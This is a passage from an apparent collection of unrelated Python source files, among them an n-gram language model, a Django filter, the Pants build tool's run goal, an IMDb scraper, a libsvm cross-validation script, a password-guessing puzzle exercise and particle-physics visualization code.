print(self.bigram_matrix[i])
def generate_conditional_prob(self):
for i in range(self.map_size):
for j in range(self.map_size):
char_i = self.get_char(i)
char_j = self.get_char(j)
x = (self.bigram_matrix[i][j] + self.delta) / (self.count_char[i] + 26 * self.delta)
key = '(' + char_i + '|' + char_j + ')'
self.cond_probs[key] = x
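# Worked example of the add-delta smoothing used above (delta = 0.5): if a
# cleaned corpus of 1000 letters contains 80 occurrences of 'e', the Unigram
# estimate is P(e) = (80 + 0.5) / (1000 + 26 * 0.5) = 80.5 / 1013, roughly 0.0795.
# Hypothetical end-to-end use, assuming two plain-text corpus files exist:
#   uni = Unigram(['corpus_en_1.txt', 'corpus_en_2.txt'])
#   LanguageModel.write_file_lang_model(uni.probs_alpha, 'unigram_model.txt')
#   bi = Bigram(['corpus_en_1.txt', 'corpus_en_2.txt'])
#   LanguageModel.write_file_lang_model(bi.cond_probs, 'bigram_model.txt')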
|
"""add three time filed
Revision ID: ed535bd21f09
Revises: 0a43e5b16392
Create Date: 2019-12-12 13:44:51.913300
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ed535bd21f09'
down_revision = '0a43e5b16392'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
|
from django_filters import rest_framework as filters
from mainapp.models import Event
class EventFilter(filters.FilterSet):
start_date = filters.DateTimeFromToRangeFilter(field_name='start_date')
class Meta:
model = Event
fields = ['start_date']
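# Illustrative usage sketch: DateTimeFromToRangeFilter exposes two query
# parameters derived from the filter name, start_date_after and
# start_date_before. The URL and values below are examples, not project routes.
#   GET /events/?start_date_after=2020-01-01T00:00&start_date_before=2020-02-01T00:00
#   f = EventFilter({'start_date_after': '2020-01-01'}, queryset=Event.objects.all())
#   f.qs  # only events whose start_date is on or after 2020-01-01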
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from abc import ABCMeta
from dataclasses import dataclass
from enum import Enum
from typing import ClassVar, Iterable, Mapping, Optional, Tuple, TypeVar, Union
from typing_extensions import final
from pants.core.subsystems.debug_adapter import DebugAdapterSubsystem
from pants.core.util_rules.environments import _warn_on_non_local_environments
from pants.engine.env_vars import CompleteEnvironmentVars
from pants.engine.environment import EnvironmentName
from pants.engine.fs import Digest, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.specs_rules import (
AmbiguousImplementationsException,
TooManyTargetsException,
)
from pants.engine.process import InteractiveProcess, InteractiveProcessResult
from pants.engine.rules import Effect, Get, Rule, _uncacheable_rule, collect_rules, goal_rule, rule
from pants.engine.target import (
BoolField,
FieldSet,
NoApplicableTargetsBehavior,
Target,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.global_options import GlobalOptions
from pants.option.option_types import ArgsListOption, BoolOption
from pants.util.frozendict import FrozenDict
from pants.util.memo import memoized
from pants.util.strutil import help_text, softwrap
logger = logging.getLogger(__name__)
_T = TypeVar("_T")
class RunInSandboxBehavior(Enum):
"""Defines the behavhior of rules that act on a `RunFieldSet` subclass with regards to use in
the sandbox.
This is used to automatically generate rules used to fulfill `experimental_run_in_sandbox`
targets.
The behaviors are as follows:
    * `RUN_REQUEST_HERMETIC`: Use the existing `RunRequest`-generating rule, and enable caching.
      Use this if you are confident the behavior of the rule relies only on state that is
      captured by pants (e.g. binary paths are found using `EnvironmentVarsRequest`), and that
      the rule only refers to files in the sandbox.
    * `RUN_REQUEST_NOT_HERMETIC`: Use the existing `RunRequest`-generating rule, and do not
      enable caching. Use this if your existing rule is mostly suitable for use in the sandbox,
      but you cannot guarantee reproducible behavior.
* `CUSTOM`: Opt to write your own rule that returns `RunInSandboxRequest`.
* `NOT_SUPPORTED`: Opt out of being usable in `experimental_run_in_sandbox`. Attempting to use
such a target will result in a runtime exception.
"""
RUN_REQUEST_HERMETIC = 1
RUN_REQUEST_NOT_HERMETIC = 2
CUSTOM = 3
NOT_SUPPORTED = 4
@union(in_scope_types=[EnvironmentName])
class RunFieldSet(FieldSet, metaclass=ABCMeta):
"""The fields necessary from a target to run a program/script."""
supports_debug_adapter: ClassVar[bool] = False
run_in_sandbox_behavior: ClassVar[RunInSandboxBehavior]
@final
@classmethod
def rules(cls) -> Iterable[Union[Rule, UnionRule]]:
yield UnionRule(RunFieldSet, cls)
if not cls.supports_debug_adapter:
yield from _unsupported_debug_adapter_rules(cls)
yield from _run_in_sandbox_behavior_rule(cls)
class RestartableField(BoolField):
alias = "restartable"
default = False
help = help_text(
"""
If true, runs of this target with the `run` goal may be interrupted and
restarted when its input files change.
"""
)
@dataclass(frozen=True)
class RunRequest:
digest: Digest
# Values in args and in env can contain the format specifier "{chroot}", which will
# be substituted with the (absolute) chroot path.
args: Tuple[str, ...]
extra_env: FrozenDict[str, str]
immutable_input_digests: Mapping[str, Digest] | None = None
append_only_caches: Mapping[str, str] | None = None
def __init__(
self,
*,
digest: Digest,
args: Iterable[str],
extra_env: Optional[Mapping[str, str]] = None,
immutable_input_digests: Mapping[str, Digest] | None = None,
append_only_caches: Mapping[str, str] | None = None,
) -> None:
object.__setattr__(self, "digest", digest)
object.__setattr__(self, "args", tuple(args))
object.__setattr__(self, "extra_env", FrozenDict(extra_env or {}))
object.__setattr__(
self, "immutable_input_digests", FrozenDict(immutable_input_digests or {})
)
object.__setattr__(self, "append_only_caches", FrozenDict(append_only_caches or {}))
def to_run_in_sandbox_request(self) -> RunInSandboxRequest:
return RunInSandboxRequest(
args=self.args,
digest=self.digest,
extra_env=self.extra_env,
immutable_input_digests=self.immutable_input_digests,
append_only_caches=self.append_only_caches,
)
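# Illustrative sketch only (not part of the upstream module): shows the "{chroot}"
# placeholder described in the comment on RunRequest above. Both occurrences of
# "{chroot}" would be substituted with the absolute sandbox path before the
# process is launched; the digest argument and the script name are placeholders
# supplied by the caller, not real build outputs.
def _example_chroot_run_request(script_digest: Digest) -> RunRequest:
    return RunRequest(
        digest=script_digest,
        args=("{chroot}/run.sh",),
        extra_env={"SCRIPT_DIR": "{chroot}"},
    )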
class RunDebugAdapterRequest(RunRequest):
"""Like RunRequest, but launches the process using the relevant Debug Adapter server.
The process should be launched waiting for the client to connect.
"""
class RunInSandboxRequest(RunRequest):
"""A run request that launches the process in the sandbox for use as part of a build rule.
The arguments and environment should only use values relative to the build root (or prefixed
with `{chroot}`), or refer to binaries that were fetched with `BinaryPathRequest`.
    Presently, implementors can opt to treat the existing `RunRequest`-generating rule as not
    guaranteeing hermeticity, which will internally mark the rule as uncacheable. In such a case,
    non-safe APIs can be used; however, this behavior can result in poorer performance, and only
    exists as a stop-gap while implementors work to make sure their `RunRequest`-generating rules
    can be used in a hermetic context, or write new custom rules. (See the Plugin Upgrade Guide
    for details).
"""
class RunSubsystem(GoalSubsystem):
name = "run"
help = help_text(
"""
Runs a binary target.
This goal propagates the return code of the underlying executable.
If your application can safely be restarted while it is running, you can pass
`restartable=True` on your binary target (for supported types), and the `run` goal
will automatically restart them as all relevant files change. This can be particularly
useful for server applications.
"""
)
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return RunFieldSet in union_membership
args = ArgsListOption(
example="val1 val2 --debug",
tool_name="the executed target",
passthrough=True,
)
# See also `test.py`'s same option
debug_adapter = BoolOption(
default=False,
help=softwrap(
"""
Run the interactive process using a Debug Adapter
(https://microsoft.github.io/debug-adapter-protocol/) for the language if supported.
The interactive process used will be immediately blocked waiting for a client before
continuing.
"""
),
)
class Run(Goal):
subsystem_cls = RunSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
async def _find_what_to_run(
goal_description: str,
) -> tuple[RunFieldSet, Target]:
targets_to_valid_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
RunFieldSet,
goal_description=goal_description,
no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
),
)
mapping = targets_to_valid_field_sets.mapping
if len(mapping) > 1:
raise TooManyTargetsException(mapping, goal_description=goal_description)
target, field_sets = next(iter(mapping.items()))
if len(field_sets) > 1:
raise AmbiguousImplementationsException(
target,
field_sets,
goal_description=goal_description,
)
return field_sets[0], target
@goal_rule
async def run(
run_subsystem: RunSubsystem,
debug_adapter: DebugAdapterSubsystem,
global_options: GlobalOptions,
workspace: Workspace, # Needed to enable sideeffecting.
complete_env: CompleteEnvironmentVars,
) -> Run:
field_set, target = await _find_what_to_run("the `run` goal")
await _warn_on_non_local_environments((target,), "the `run` goal")
request = await (
Get(RunRequest, RunFieldSet, field_set)
if not run_subsystem.debug_adapter
else Get(RunDebugAdapterRequest, RunFieldSet, field_set)
)
restartable = target.get(RestartableField).value
if run_subsystem.debug_adapter:
logger.info(
softwrap(
f"""
Launching debug adapter at '{debug_adapter.host}:{debug_adapter.port}',
which will wait for a client connection...
"""
)
)
result = await Effect(
InteractiveProcessResult,
InteractiveProcess(
argv=(*request.args, *run_subsystem.args),
env={**complete_env, **request.extra_env},
input_digest=request.digest,
run_in_workspace=True,
restartable=restartable,
keep_sandboxes=global_options.keep_sandboxes,
immutable_input_digests=request.immutable_input_digests,
append_only_caches=request.append_only_caches,
),
)
return Run(result.exit_code)
@memoized
def _unsupported_debug_adapter_rules(cls: type[RunFieldSet]) -> Iterable:
"""Returns a rule that implements DebugAdapterRequest by raising an error."""
@rule(_param_type_overrides={"request": cls})
async def get_run_debug_adapter_request(request: RunFieldSet) -> RunDebugAdapterRequest:
raise NotImplementedError(
"Running this target type with a debug adapter is not yet supported."
)
return collect_rules(locals())
async def _run_request(request: RunFieldSet) -> RunInSandboxRequest:
run_request = await Get(RunRequest, RunFieldSet, request)
return run_request.to_run_in_sandbox_request()
@memoized
def _run_in_sandbox_behavior_rule(cls: type[RunFieldSet]) -> Iterable:
"""Returns a default rule that helps fulfil `experimental_run_in_sandbox` targets.
If `RunInSandboxBehavior.CUSTOM` is specified, rule implementors must write a rule that returns
a `RunInSandboxRequest`.
"""
@rule(_param_type_overrides={"request": cls})
async def not_supported(request: RunFieldSet) -> RunInSandboxRequest:
raise NotImplementedError(
"Running this target type within the sandbox is not yet supported."
)
@rule(_param_type_overrides={"request": cls})
async def run_request_hermetic(request: RunFieldSet) -> RunInSandboxRequest:
return await _run_request(request)
@_uncacheable_rule(_param_type_overrides={"request": cls})
async def run_request_not_hermetic(request: RunFieldSet) -> RunInSandboxRequest:
return await _run_request(request)
default_rules = {
RunInSandboxBehavior.NOT_SUPPORTED: [not_supported],
RunInSandboxBehavior.RUN_REQUEST_HERMETIC: [run_request_hermetic],
RunInSandboxBehavior.RUN_REQUEST_NOT_HERMETIC: [run_request_not_hermetic],
RunInSandboxBehavior.CUSTOM: [],
}
return collect_rules(
{_rule.__name__: _rule for _rule in default_rules[cls.run_in_sandbox_behavior]}
)
def rules():
return collect_rules()
|
import logging as log
from pprint import pformat
GOT_LOGGER = False
def get_logger():
"Helper function to get the logger"
global GOT_LOGGER
if GOT_LOGGER:
return log
GOT_LOGGER = True
logger = log.getLogger()
logger.setLevel(log.DEBUG)
ch = log.StreamHandler()
ch.setFormatter(log.Formatter('%(levelname)s: %(message)s'))
    # remove any pre-existing handlers before attaching ours
    for existing in list(logger.handlers):
        logger.removeHandler(existing)
logger.addHandler(ch)
return log
|
import curses
import random
import time
def hud(win, score):
win.addstr(1, 1, "Score: " + str(score))
def update_player(win_col, k, player):
if k == ord("a") and player[2] >= 1:
player[2] -= 1
if k == ord("d") and player[2] <= win_col:
player[2] += 1
if k == ord("s"):
player[3] = True
return player
def main(stdscr):
curses.noecho()
curses.cbreak()
curses.curs_set(0)
score = 0
game_win = curses.newwin(0, 0)
game_win.nodelay(True)
game_win_max = game_win.getmaxyx()
hud_win = curses.newwin(3, 11, 0, 0)
hud_win.border()
hud_win.nodelay(True)
hud(hud_win, score)
# Player = [Char, Y, X, Shoot]
player = \
[ \
'^', game_win_max[0]-1, game_win_max[1]//2, False \
]
while True:
game_win.clear()
hud_win.clear()
hud(hud_win, score)
player[3] = False
k = game_win.getch()
if k == "Err":
k = ""
player = update_player(game_win_max[1], k, player)
game_win.addch(player[1], player[2], player[0])
game_win.refresh()
hud_win.refresh()
time.sleep(0.1)
curses.nocbreak()
curses.echo()
if __name__ == "__main__":
curses.wrapper(main)
|
import torch
from models.faster_rcnn import fasterrcnn_resnet_fpn
from models.centernet.ctdet import CenterNetDetect
def get_model_faster(name, num_classes, pretrained_path=None):
with_mask = name.find('mask') != -1
resnet_backbone = name[name.find('resnet'):name.find('resnet') + 9].strip('_') # 'resnet18', 'resnet34', 'resnet50'
model = fasterrcnn_resnet_fpn(num_classes=num_classes,
pretrained_path=pretrained_path,
mask=with_mask,
backbone=resnet_backbone)
return model
def get_model_center(model_params, loss_params=None, pretrained_path=None):
heads = {'hm': model_params.heads_hm, 'wh': model_params.heads_wh, 'reg': model_params.heads_reg}
model = CenterNetDetect(model_params.num_classes, model_params.arch, heads, model_params.head_conv,
max_per_image=model_params.max_per_image, loss_params=loss_params)
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)
model.load_state_dict(state_dict)
return model
def prepare_model(num_classes, device, pretrained_path, model_params, distributed, ids_gpu, loss_params=None):
pretrained_path = pretrained_path if len(pretrained_path) > 0 else None
if model_params.name == 'center':
model = get_model_center(model_params, loss_params, pretrained_path=pretrained_path)
else:
model = get_model_faster(model_params.name, num_classes, pretrained_path=pretrained_path)
model.to(device)
model_without_ddp = model
if distributed:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[ids_gpu], find_unused_parameters=True)
model_without_ddp = model.module
return model, model_without_ddp
|
import xlrd
import sys
import os
data = xlrd.open_workbook("FormatDatalibsvm.xlsx")
table = data.sheet_by_name('FormatDatalibsvm')
nrows = table.nrows
def init():
os.system('del learn.txt')
os.system('del predict.txt')
for j in xrange(0, nrows):
init()
learn = open('learn.txt' ,'w')
pre = open('predict.txt', 'w')
#print j
for i in xrange(0, nrows):
T = table.row_values(i)
if i == j:
for ele in T:
                pre.write(str(ele))  # write the sample to be predicted to the prediction file
pre.write('\n')
else:
for ele in T:
                learn.write(str(ele))  # write the training samples to the training file
learn.write('\n')
learn.close()
pre.close()
#print 'Hi'
os.system('svm-scale.exe learn.txt > learn.scale')
os.system('svm-train.exe learn.scale train_file')
os.system('svm-predict.exe predict.txt train_file output_file >> D:\\result.txt')
os.system('del learn.scale train_file output_file')
|
import re
import sys
import requests
import pandas as pd
from bs4 import BeautifulSoup
# Create all required lists
ranks=[]
movie_names=[]
links=[]
Rating_Values=[]
Directors=[]
Writers=[]
Stars=[]
casts=[]
Genres=[]
Certificate=[]
Country=[]
Language=[]
Release_Date=[]
Filming_Locations=[]
Budget=[]
Opening_Weekend_USA=[]
Gross_USA=[]
Cumulative_Worldwide_Gross=[]
Runtime=[]
def make_soup(url):
"""
Use requests and BeautifulSoup 4 library to turn the parameter
URL into and return HTML code in BeautifulSoup format.
"""
    html = requests.get(url)  # fetch the page at the given URL
html.encoding = 'utf-8'
soup = BeautifulSoup(html.text, 'html5lib')
return soup
def get_movie(soup):
"""
Return dictionary of rank, movie name and movie information link.
"""
    rank = 1
movies = {}
link = 'https://www.imdb.com'
if soup.find_all('td', class_='titleColumn') != []:
for tdtag in soup.find_all('td', class_='titleColumn'):
info = {}
year = tdtag.find_all('span', class_='secondaryInfo')[0].text
info[tdtag.find_all('a')[0].text + ' ' + year] = link + tdtag.find_all('a')[0].get('href')
movies[str(rank)] = info
rank += 1
return movies
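# Shape of the returned dictionary (illustrative values only):
# {'1': {'The Shawshank Redemption (1994)': 'https://www.imdb.com/title/tt0111161/'},
#  '2': {'The Godfather (1972)': 'https://www.imdb.com/title/tt0068646/'}, ...}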
def blok(name, soup, type_list):
"""
Set information from class 'txt-block' to corresponding list
"""
for date in soup.find_all('div', class_='txt-block'):
if name in date.text:
date = date.text.lstrip()
date = ' '.join(date.split())
if (':' in date):
type_list.append(date[date.find(':')+2:])
else:
type_list.append(date)
print(date)
return 0
def info(url):
"""
Set all detail information from movie's information page to corresponding list
"""
soup = make_soup(url)
if soup.find_all('span', itemprop="ratingValue"):
for ratingValue in soup.find_all('span', itemprop="ratingValue"):
print('Rating Value:', ratingValue.text)
Rating_Values.append(ratingValue.text)
else:
Rating_Values.append('')
if soup.find_all('div', class_='credit_summary_item'):
d=0
w=0
s=0
for summary in soup.find_all('div', class_='credit_summary_item'):
title = summary.find_all('h4')[0].text
names = []
for name in summary.find_all('a'):
name = re.sub(r'<[^>]*>', '', str(name)).lstrip()
names.append(name)
names = ', '.join(names)
if 'Director' in title:
Directors.append(names)
d=1
if 'Writers' in title:
Writers.append(names)
w=1
if 'Stars' in title:
Stars.append(names)
s=1
print(title, names)
if d == 0:
Directors.append('')
if w == 0:
Writers.append('')
if s == 0:
Stars.append('')
else:
Directors.append('')
Writers.append('')
Stars.append('')
if soup.find_all('div', class_='article', id='titleCast'):
c_list = []
for article in soup.find_all('div', class_='article', id='titleCast'):
for cast_list in article.find_all('table', class_='cast_list'):
for cast in cast_list.find_all('tr', class_='odd'):
for name in cast.find_all('td', class_=''):
name = name.text.lstrip()
name = ' '.join(name.split())
c_list.append(name)
c_list = ', '.join(c_list)
casts.append(c_list)
print("cast_list", c_list)
else:
casts.append('')
if soup.find_all('div', class_='see-more inline canwrap'):
for keywords in soup.find_all('div', class_='see-more inline canwrap'):
title = keywords.find_all('h4', class_='inline')[0].text
words = []
if title == 'Genres:':
for c_type in keywords.find_all('a'):
c_type = re.sub(r'<[^>]*>', '', str(c_type)).lstrip()
words.append(c_type)
Genres.append(c_type)
print(title, c_type)
else:
Genres.append('')
blok('Country', soup, Country)
blok('Language', soup, Language)
blok('Release Date', soup, Release_Date)
blok('Filming Locations', soup, Filming_Locations)
blok('Budget', soup, Budget)
blok('Opening Weekend USA', soup, Opening_Weekend_USA)
blok('Gross USA', soup, Gross_USA)
blok('Cumulative Worldwide Gross', soup, Cumulative_Worldwide_Gross)
blok('Runtime', soup, Runtime)
blok('Certificate', soup, Certificate)
for i in ranks, links, Rating_Values, Directors, Writers, Stars, casts, Genres, \
Certificate, Country, Language, Release_Date, Filming_Locations, Budget, \
Opening_Weekend_USA, Gross_USA, Cumulative_Worldwide_Gross, Runtime:
if len(i) != len(Directors):
i.append('')
print('\n')
def movies_info(movies_dict):
"""
Use link of movie's information page call info function to crawl information,
and set all information to corresponding list
"""
for key in movies_dict:
rank = key
for name in movies_dict[key]:
movie_name = name
link = movies_dict[key][name]
ranks.append(rank)
movie_names.append(movie_name)
links.append(link)
print(rank, movie_name, link)
info(link)
if __name__ == '__main__':
url = "https://www.imdb.com/chart/top/"
soup = make_soup(url)
movies = get_movie(soup)
movies_info(movies)
num=1 # Check the size of all lists
for i in ranks, links, Rating_Values, Directors, Writers, Stars, casts, \
Genres, Certificate, Country, Language, Release_Date, Filming_Locations, \
Budget, Opening_Weekend_USA, Gross_USA, Cumulative_Worldwide_Gross, Runtime:
print(num, len(i))
num += 1
# Integrate all lists into pandas format (dataframe)
dataframe = pd.DataFrame({'Rank': ranks, 'Movie Names': movie_names,
'Links': links, 'Rating Values': Rating_Values, 'Directors': Directors,
'Writers': Writers, 'Stars': Stars, 'Casts': casts, 'Genres': Genres,
'Certificate': Certificate, 'Country': Country, 'Language': Language,
'Release Date': Release_Date, 'Filming Locations': Filming_Locations,
'Budget': Budget, 'Opening Weekend USA': Opening_Weekend_USA,
'Gross USA': Gross_USA, 'Cumulative Worldwide Gross': Cumulative_Worldwide_Gross, 'Runtime': Runtime})
# Make the organized dataframe into a CSV file named IMDb_top_250.csv and save it in the current directory
dataframe.to_csv("IMDb_top_250.csv",index=False,sep=',')
|
def count_common_chars(s1, s2):
"""
Given two strings s1 and s2, counts
the number of characters they have in common,
i.e. these characters must be equal and
appear at the same location in the strings.
For example, 'abcd' and 'a123' have one character in common.
'ab' and 'ba' have 0 characters in common.
"""
raise NotImplementedError()
def hack(candidates, attempt):
"""
Hacks the system.
candidates is a list of strings representing potential passwords.
attempt is a function that takes one argument X and returns
the number of characters the argument X and the actual password
have in common. This function can only be called a finite number of times.
hack should return the correct password, i.e. one of the
strings in the list candidates for which attempt
returned a value indicating that all characters were correct.
"""
raise NotImplementedError()
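# A minimal illustrative sketch (not the graded solution): count_common_chars can
# compare the two strings position by position, and hack can repeatedly query one
# candidate and keep only the candidates that agree with the reported score.
def _count_common_chars_sketch(s1, s2):
    # characters only count when they are equal and at the same index
    return sum(1 for a, b in zip(s1, s2) if a == b)
def _hack_sketch(candidates, attempt):
    remaining = list(candidates)
    while remaining:
        guess = remaining.pop(0)
        score = attempt(guess)
        if score == len(guess):
            return guess
        # the real password must share exactly `score` characters with this guess
        remaining = [c for c in remaining
                     if _count_common_chars_sketch(guess, c) == score]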
|
#coding:gb2312
# work with multiple files
def words_num(filename):
try:
with open(filename) as f:
contents = f.read()
except FileNotFoundError:
"""
        msg = "Sorry, the file " + filename + " does not exist."
print(msg)
"""
        pass  # the pass statement tells Python to do nothing here
else:
words = contents.split()
num_words = len(words)
print(filename.title()+"这篇文章一共有 "+str(num_words)+" 个单词。")
filenames = ['test.txt','pyhton_note.txt','lyl.txt','python_note.txt']
for filename in filenames:
words_num(filename)
|
#!/usr/bin/env python
from __future__ import print_function
import tqdm
import argparse
import os
import numpy as np
import array
import fastjet as fj
from pyjetty.mputils import MPBase
from pyjetty.mputils import DataIO
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
import ROOT
ROOT.gROOT.SetBatch(True)
class Data2MP4(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(file_list='PbPb_file_list.txt', n_events=500, output='output', run_jetfinder=False)
super(Data2MP4, self).__init__(**kwargs)
self.data_io = DataIO(file_list=self.file_list)
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, 0., 2.*ROOT.TMath.Pi())
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
#self.hetaphi_jet = ROOT.TH2F('_hetaphi_jet', '_hetaphi_jet;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
#self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 101, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -1, 1, 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi_jet = ROOT.TH2F('_hetaphi_jet', '_hetaphi_jet;#eta;#varphi', 51, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.mean_eta = ROOT.TH1F('_hmean_eta', '_hmean_eta;<#eta>', 101, -0.3, 0.3)
# self.mean_phi = ROOT.TH1F('_hmean_phi', '_hmean_phi;<#varphi>', 101, ROOT.TMath.Pi()-0.3, ROOT.TMath.Pi()+0.3)
self.mean_phi = ROOT.TH1F('_hmean_phi', '_hmean_phi;<#varphi>', 101, -0.3, +0.3)
self.mean_e = ROOT.TH1F('_hmean_e', '_hmean_e;<E (GeV)>', 100, 0, 2)
self.tc = None
if self.run_jetfinder:
fj.ClusterSequence.print_banner()
def run(self):
_err_level_tmp = ROOT.gErrorIgnoreLevel
if self.tc is None:
self.tc = ROOT.TCanvas('_tc', '_tc', 800, 800)
self.tc.Divide(2,2)
ROOT.gErrorIgnoreLevel = ROOT.kWarning
for iev in tqdm.tqdm(range(self.n_events)):
parts = self.data_io.load_event(offset=10000)
if self.run_jetfinder:
jet_R0 = 0.4
jet_def = fj.JetDefinition(fj.antikt_algorithm, jet_R0)
jets = fj.sorted_by_pt(jet_def(parts))
if len(jets) > 0:
jet = jets[0]
else:
jet = fj.PseudoJet()
else:
jet = fj.PseudoJet()
self.hetaphi.Reset()
self.hetaphi_jet.Reset()
#_tmp = [self.hetaphi.Fill(p.eta(), jet.delta_phi_to(p), p.e()) for p in parts]
_tmp = [self.hetaphi.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in parts]
if self.run_jetfinder:
# _tmp = [self.hetaphi_jet.Fill(p.eta(), jet.delta_phi_to(p), p.e()) for p in jet.constituents()]
_tmp = [self.hetaphi_jet.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in jet.constituents()]
_e = [p.e() for p in parts]
_phi = [p.phi()-ROOT.TMath.Pi() for p in parts]
# _phi = [jet.delta_phi_to(p) for p in parts]
_eta = [p.eta() for p in parts]
# self.mean_eta.Fill(self.hetaphi.GetMean(1))
self.mean_eta.Fill(np.mean(_eta))
# self.mean_phi.Fill(self.hetaphi.GetMean(2))
self.mean_phi.Fill(np.mean(_phi))
self.mean_e.Fill(np.mean(_e))
self.tc.cd()
# self.hetaphi.Scale(1./self.hetaphi.Integral())
self.hetaphi.SetMaximum(10.)
self.hetaphi.SetMinimum(0.)
self.tc.cd(1)
self.hetaphi.Draw('colz')
# self.hetaphi.Draw('lego2')
self.hetaphi_jet.SetLineColor(ROOT.kRed)
self.hetaphi_jet.SetFillColor(ROOT.kRed)
self.hetaphi_jet.SetFillStyle(1001)
self.hetaphi_jet.Draw('cont3 same')
self.tc.cd(2)
self.mean_e.Draw()
self.tc.cd(3)
self.mean_phi.Draw()
self.tc.cd(4)
self.mean_eta.Draw()
self.tc.SaveAs('_{}_{}.png'.format(self.output, iev), '.png')
ROOT.gErrorIgnoreLevel = _err_level_tmp
def save_mp4(self):
# os.system('ffmpeg -i _{}_%01d.png -vcodec mpeg4 -y {}.mp4'.format(self.output, self.output))
os.system('ffmpeg -r 4 -f image2 -s 1920x1080 -i _{}_%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p {}.mp4'.format(self.output, self.output))
class PythiaJetty(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(pthatmin=100, eta_max=1, jet_pt_min=10, jet_R0=0.4)
super(PythiaJetty, self).__init__(**kwargs)
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=None)
pyconf.add_standard_pythia_args(parser)
args = parser.parse_args('')
args.py_pthatmin = self.pthatmin
mycfg = []
self.pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
if not self.pythia:
print("[e] pythia initialization failed.")
self.parts_pythia = None
def get_event(self):
if not self.pythia:
return None
parts_selector = fj.SelectorAbsEtaMax(self.eta_max)
jet_selector = fj.SelectorPtMin(self.jet_pt_min) & fj.SelectorAbsEtaMax(self.eta_max - 1.05 * self.jet_R0)
jet_def = fj.JetDefinition(fj.antikt_algorithm, self.jet_R0)
while True:
if not self.pythia.next():
continue
self.parts_pythia = pythiafjext.vectorize_select(self.pythia, [pythiafjext.kFinal])
parts_gen = parts_selector(self.parts_pythia)
signal_jets = fj.sorted_by_pt(jet_selector(jet_def(self.parts_pythia)))
if len(signal_jets) < 1:
continue
else:
break
return self.parts_pythia
class Data2MP4Morph(MPBase):
def __init__(self, **kwargs):
self.configure_from_args(file_list='PbPb_file_list.txt', n_events=500, output='output')
super(Data2MP4Morph, self).__init__(**kwargs)
self.data_io = DataIO(file_list=self.file_list)
# self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 51, -ROOT.TMath.Pi(), ROOT.TMath.Pi(), 51, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
# self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#eta;#varphi', 101, -1, 1, 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi())
self.hetaphi = ROOT.TH2F('_hetaphi', '_hetaphi;#varphi;#eta', 101, -ROOT.TMath.Pi(), +ROOT.TMath.Pi(), 101, -1, 1)
self.tc = None
self.iframe = 0
self.pythia = PythiaJetty(pthatmin=100, eta_max=1, jet_pt_min=20, jet_R0=0.4)
def make_a_frame(self, h):
self.tc.cd()
for ibx in range(1, h.GetNbinsX() + 1):
for iby in range(1, h.GetNbinsY() + 1):
if h.GetBinContent(ibx, iby) < 1e-1:
h.SetBinContent(ibx, iby, 1e-1)
h.SetMaximum(100.)
h.SetMinimum(1e-1)
# h.Draw('colz')
h.SetName('{}_f{}'.format(h.GetName().split('_f')[0], self.iframe))
h.Draw('LEGO2 FB BB')
# h.Draw('surf2 FB BB')
# h.Draw('CONT3 COLZ')
# h.Draw('CYL LEGO2 COLZ')
h.SetLineColor(ROOT.kWhite)
h.SetLineColorAlpha(ROOT.kWhite, 1.)
# h.Draw('CYL SURF2')
# h.Draw('SURF2')
# h.Draw('PSR LEGO2')
# self.tc.SetLogz()
self.tc.SaveAs('_{}_{}.png'.format(self.output, self.iframe), '.png')
self.iframe = self.iframe + 1
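	# morph() below renders nframes intermediate frames by linearly interpolating
	# the bin contents from histogram hfrom towards hto (a simple cross-fade).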
def morph(self, hfrom, hto, nframes):
_hmorph = hfrom.Clone("_hmorph")
_hmorph.SetDirectory(0)
_hdeltas = hto.Clone('_delta')
_hdeltas.Add(hfrom, -1.)
for ifr in tqdm.tqdm(range(1, nframes + 1)):
fr = 1.0 * ifr / nframes
for ibx in range(1, hfrom.GetNbinsX() + 1):
for iby in range(1, hfrom.GetNbinsY() + 1):
v = hfrom.GetBinContent(ibx, iby) + fr * _hdeltas.GetBinContent(ibx, iby)
_hmorph.SetBinContent(ibx, iby, v)
self.make_a_frame(_hmorph)
def run(self):
_err_level_tmp = ROOT.gErrorIgnoreLevel
